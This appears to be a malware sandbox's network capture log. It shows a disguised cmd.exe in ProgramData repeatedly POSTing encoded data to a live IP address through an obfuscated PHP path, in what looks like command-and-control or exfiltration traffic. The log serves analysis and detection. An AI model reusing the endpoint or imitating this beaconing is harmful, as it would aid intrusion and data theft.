Jan 3, 2025 20:47:45.393393040 CET	4944	OUT	Data Raw: 71 36 42 72 37 75 56 56 54 30 58 4f 49 58 63 76 63 38 4d 68 52 36 75 61 38 79 4f 6d 6f 42 39 33 61 43 75 46 49 67 64 68 7a 6d 49 78 33 6f 36 66 67 6d 75 4e 39 4b 64 68 79 4a 6e 7a 53 32 70 55 67 38 70 2b 44 6e 4c 6a 32 70 77 74 51 53 35 75 74 35 Data Ascii: q6Br7uVVT0XOIXcvc8MhR6ua8yOmoB93aCuFIgdhzmIx3o6fgmuN9KdhyJnzS2pUg8p+DnLj2pwtQS5ut5JrD4w4OE8KsSxDybcrkizE0cfhnztVVZYPIB8uR79+MBYu9A4d93xCDotc9BOSqNcLvpf6wceu2P4z8Y6DJ31JWPbT0SnBWufKieaNJ1sx2B3LygUy/Vv8wO7dpCSWvLr8Feh3C/tG1BRjtJRDTLK5w8I32rraJ5x
Jan 3, 2025 20:47:45.393634081 CET	4944	OUT	Data Raw: 39 36 31 61 36 7a 58 44 4f 79 63 77 37 49 47 30 67 39 4b 50 71 56 6b 32 30 61 32 6c 68 56 6e 36 6d 7a 72 58 62 45 33 49 39 59 2f 61 31 4c 35 5a 6b 75 57 31 4c 53 6d 77 64 54 4a 32 68 56 38 78 4b 55 67 4d 32 37 73 46 4c 33 72 4c 66 70 6a 66 41 6c Data Ascii: 961a6zXDOycw7IG0g9KPqVk20a2lhVn6mzrXbE3I9Y/a1L5ZkuW1LSmwdTJ2hV8xKUgM27sFL3rLfpjfAl1WuiQnFjSZxLH6YEeUL+jI4OHUK76o1hsPHhQF2Wa1qCh+115aanFrvR4gzn/Wnf6vz34hEStz8cAZWN4QxwMRRZlEeUDMvAquuOorhlwuuGWqPlRIDyKNyqNxT6DUWtHGNXOm81/H0mWRMkSz9oXDgp69Qks9286
Jan 3, 2025 20:47:45.393959999 CET	2472	OUT	Data Raw: 63 4b 30 30 36 68 57 62 45 35 6d 2b 6b 30 39 30 4d 2f 62 64 57 2b 68 65 63 7a 4c 6a 4a 35 45 4a 66 70 6c 71 66 61 73 4f 77 55 55 6e 56 36 44 37 6d 48 6d 44 68 6b 56 64 64 5a 66 48 65 51 79 72 44 33 35 4e 53 79 7a 62 4f 51 67 30 2b 67 76 32 6c 2b Data Ascii: cK006hWbE5m+k090M/bdW+heczLjJ5EJfplqfasOwUUnV6D7mHmDhkVddZfHeQyrD35NSyzbOQg0+gv2l+Wl92VW+cnimj4UjuAe/yLtiANSa37IygoEs2iLqHcYDhVPhWe2L468C/Hwq0dVDxbRy1z2nTKIYNq+JzXRH3a48VWnGw9MZ+fuMcyymJN839RxoErWCrAPhS/HpEKeTKRFYX4e+RqS7nG0ihhnvRkZE8U5VF8TL0n
Jan 3, 2025 20:47:45.398180962 CET	4944	OUT	Data Raw: 50 79 4c 45 4a 78 53 33 51 59 30 4d 34 75 4f 50 66 5a 6b 4e 49 54 72 56 35 33 6b 51 33 52 49 72 6b 53 74 36 6b 57 71 34 56 58 45 59 63 67 70 72 79 52 43 69 42 79 65 6c 52 72 6b 30 53 30 55 58 6b 72 4b 6f 30 45 43 57 34 4e 41 78 68 4b 49 32 4c 73 Data Ascii: PyLEJxS3QY0M4uOPfZkNITrV53kQ3RIrkSt6kWq4VXEYcgpryRCiByelRrk0S0UXkrKo0ECW4NAxhKI2Ls2CXo24TtmnmIXLaOBAKEFciAI+/K0+92OCsVSXwiDQwWSssgK1DPOFnB2crG2JMgHJ/CFVu7hzFolweTDohZuiMloWMjwVDQp2wSHpVxJdMoHoiWehuLXWQmmm6XJe6FaaLXpJvTd15N1IRNOaKtJWfg6EYmtaO7a
Jan 3, 2025 20:47:45.398238897 CET	4944	OUT	Data Raw: 31 35 64 39 77 47 77 65 79 4f 38 78 34 49 48 62 33 58 6a 41 61 42 4e 7a 63 44 34 50 44 77 52 6f 48 4c 31 78 31 78 63 65 2f 2b 4b 73 68 6c 56 6f 38 76 7a 43 4b 4f 72 65 6c 36 39 64 34 4a 33 58 4c 6a 70 75 35 7a 30 63 49 76 70 55 56 4d 66 71 50 69 Data Ascii: 15d9wGweyO8x4IHb3XjAaBNzcD4PDwRoHL1x1xce/+KshlVo8vzCKOrel69d4J3XLjpu5z0cIvpUVMfqPi3DPWb08XfEbQ11U/DLf93xNCDyciIEDf1fUnZNGfF1PMKni5aEvnkBIoXs9v5X6utsVIWcHqd5WgiDCHPAacgj6CxUMSGbhOheY7bNykgkke45G0tqD0ei4qISTvs/1XkCgMKIWq7/a/Hh4WmcZQKumTBCiWKvhCb
Jan 3, 2025 20:47:45.398263931 CET	4944	OUT	Data Raw: 50 75 70 78 4c 56 4b 79 6c 50 31 67 4a 34 4c 7a 49 43 39 30 6d 41 6f 72 76 2f 73 39 53 36 52 49 72 75 79 6c 36 34 33 32 55 4a 66 75 38 43 7a 68 31 69 48 30 30 55 49 65 6a 57 61 52 71 6f 39 53 4c 46 52 6c 4b 33 74 61 46 41 48 50 75 78 53 62 76 54 Data Ascii: PupxLVKylP1gJ4LzIC90mAorv/s9S6RIruyl6432UJfu8Czh1iH00UIejWaRqo9SLFRlK3taFAHPuxSbvTK9hGI8QCEGeJGRlOdCUG0rKpLvb01fwI0eHPStfyEus7xsIdA9wg4WDWJ0lSEwP29WlM59RVyP2kOOYx/toCR0zmB6TNDWEVqeGcnf8iTPKj0nUXmtWei3+kovzhY9PRLR92o20Q6hOBlOxMSDE3324F4c+fRQHee
Jan 3, 2025 20:47:45.441416979 CET	34608	OUT	Data Raw: 68 6e 4a 63 32 71 70 6f 6c 6e 69 6e 6c 7a 5a 4f 49 57 6e 48 4c 70 41 51 33 45 42 41 75 65 7a 53 49 5a 65 62 33 55 53 79 4c 35 56 66 54 43 49 36 4a 44 6c 4f 38 47 71 69 53 6d 48 58 4f 6f 54 73 5a 39 39 35 2f 6a 5a 6c 63 49 75 73 34 4d 41 63 31 6c Data Ascii: hnJc2qpolninlzZOIWnHLpAQ3EBAuezSIZeb3USyL5VfTCI6JDlO8GqiSmHXOoTsZ995/jZlcIus4MAc1lHuS5RGtKSqvWawavWRp3dzZhk63XDSnrGkX7yiIAC9Vaz1gn199c07JK0j5RTXsm3bMDwF6s4Ej3VsjQluh19+KoYcCOsUUB/i3zj1qD+ZOR584DRt1phg3/Axxz3ViDs97ZmqMg8Ut4wLqMhSW4O0lOWU0DgAQI1
Jan 3, 2025 20:47:45.711139917 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:45.925276041 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:45.996280909 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:45.246521950 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:45.591322899 CET	2560	OUT	Data Raw: 5f 5e 59 5f 5c 46 5f 55 5a 5c 55 51 59 5d 54 50 56 59 5d 45 50 56 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^Y_\F_UZ\UQY]TPVY]EPVZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+#;]3=6%5\&,$Z>-;?$=1>(3'.%"$;(='_!%Y)+
Jan 3, 2025 20:47:45.903739929 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:46.036164045 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:46.241578102 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:46.590970993 CET	2560	OUT	Data Raw: 5f 56 5c 52 5c 43 5a 56 5a 5c 55 51 59 58 54 51 56 5b 5d 45 50 51 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\R\CZVZ\UQYXTQV[]EPQZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)3?^0X5&&1<[>>$)75%*)3Y9%9#Q?V+='_!%Y)?
Jan 3, 2025 20:47:46.864732027 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:46.992018938 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:46.753181934 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue
Jan 3, 2025 20:47:47.108764887 CET	1884	OUT	Data Raw: 5f 50 5c 53 5c 47 5a 5a 5a 5c 55 51 59 59 54 5a 56 51 5d 41 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _P\S\GZZZ\UQYYTZVQ]AP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(;05]14%X1(?("W%5T(#_.6:7#+='_!%Y)
Jan 3, 2025 20:47:47.454494953 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:47.584089041 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 01 25 36 27 0a 33 2b 30 08 24 5c 29 09 2a 3c 2f 06 3a 08 3b 07 22 04 3c 0d 29 0d 38 13 2a 01 23 00 21 01 2a 54 21 3f 35 5a 2a 3a 23 5b 03 1d 22 58 22 0c 39 06 32 3a 2e 03 38 09 3f 1b 26 2d 39 59 3f 3e 0f 52 37 07 39 0c 35 3e 23 0d 2c 33 2d 10 24 12 37 59 3f 3d 00 5a 30 05 21 51 00 10 39 1f 27 30 29 59 33 3c 0c 1d 26 03 0b 58 25 26 23 13 22 5a 26 18 32 06 25 13 2f 32 28 1d 31 1c 28 1b 35 0a 34 5f 29 39 04 09 32 3b 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %%6'3+0$\)</:;"<)8#!T!?5Z:#["X"92:.8?&-9Y?>R795>#,3-$7Y?=Z0!Q9'0)Y3<&X%&#"Z&2%/2(1(54_)92;"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:47.164484978 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:47.512861013 CET	2560	OUT	Data Raw: 5a 56 5c 5e 59 40 5a 5a 5a 5c 55 51 59 5b 54 56 56 5b 5d 49 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\^Y@ZZZ\UQY[TVV[]IP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+#^&>%:1Z(\+?V?$=&.*)0 -5&#Q<?'_!%Y)3
Jan 3, 2025 20:47:47.854372978 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:47.984031916 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:48.121233940 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:48.492074013 CET	2560	OUT	Data Raw: 5a 55 5c 58 5c 44 5a 54 5a 5c 55 51 59 58 54 50 56 58 5d 44 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\X\DZTZ\UQYXTPVX]DPRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?03>%4&%4<[??%6*0?_.&547T?='_!%Y)?
Jan 3, 2025 20:47:48.761467934 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:48.896807909 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V
Jan 3, 2025 20:47:49.113426924 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:49.713507891 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:50.059931993 CET	2560	OUT	Data Raw: 5a 54 59 5e 5c 44 5f 52 5a 5c 55 51 59 58 54 57 56 51 5d 45 50 57 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZTY^\D_RZ\UQYXTWVQ]EPWZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(#3."&',4]+>#U('&%5S34-&47R+-'_!%Y)?
Jan 3, 2025 20:47:50.400473118 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:50.529957056 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:50.658536911 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:51.012890100 CET	2560	OUT	Data Raw: 5f 53 59 5f 59 42 5a 56 5a 5c 55 51 59 5b 54 50 56 5c 5d 41 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _SY_YBZVZ\UQY[TPV\]APPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(V0&>>&4:1<#()7!&X)R*/Z:1#'(+'_!%Y)3
Jan 3, 2025 20:47:51.311006069 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:51.445928097 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:52.086200953 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:52.435069084 CET	2560	OUT	Data Raw: 5f 54 59 59 59 47 5a 5b 5a 5c 55 51 59 59 54 50 56 50 5d 49 50 51 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _TYYYGZ[Z\UQYYTPVP]IPQZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&<#,0%19]2/<=#U+4"&-)W=+X9&""43W?'_!%Y)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:52.598539114 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1860 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:52.950612068 CET	1860	OUT	Data Raw: 5f 57 59 58 5c 47 5a 51 5a 5c 55 51 59 58 54 57 56 5b 5d 48 50 56 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _WYX\GZQZ\UQYXTWV[]HPVZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(3]'5%'%%<$[?.8<4$.T37Z.67'S('_!%Y)?
Jan 3, 2025 20:47:53.307080030 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:53.443871021 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:53 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 26 58 24 36 2c 57 27 28 0a 0b 30 04 29 0e 3c 12 20 1b 2e 08 24 59 36 03 2f 54 29 0d 01 05 3d 3c 24 11 35 59 21 0e 22 2f 3e 00 28 3a 23 5b 03 1d 21 06 35 32 21 06 27 29 29 5a 38 33 28 08 26 3d 3e 06 28 2e 03 53 23 58 22 11 35 07 3c 11 2f 1d 21 10 26 2c 2c 06 28 3e 22 5a 33 3f 21 51 00 10 3a 0d 27 33 25 58 24 02 22 5b 32 3e 26 03 27 35 3b 5a 35 3c 00 57 31 2b 2d 10 38 22 3c 1d 27 32 3b 09 21 0d 01 02 3e 5f 21 56 26 01 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: &X$6,W'(0)< .$Y6/T)=<$5Y!"/>(:#[!52!'))Z83(&=>(.S#X"5</!&,,(>"Z3?!Q:'3%X$"[2>&'5;Z5<W1+-8"<'2;!>_!V&"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:52.728409052 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:53.075546980 CET	2560	OUT	Data Raw: 5a 55 5c 5b 59 43 5a 5a 5a 5c 55 51 59 5d 54 56 56 58 5d 42 50 50 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\[YCZZZ\UQY]TVVX]BPPZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(0+]$.Y%'9Y%X>-Q(B6W1>%T=3^.%=74 +'_!%Y)+
Jan 3, 2025 20:47:53.381468058 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:53.524153948 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:53.666493893 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
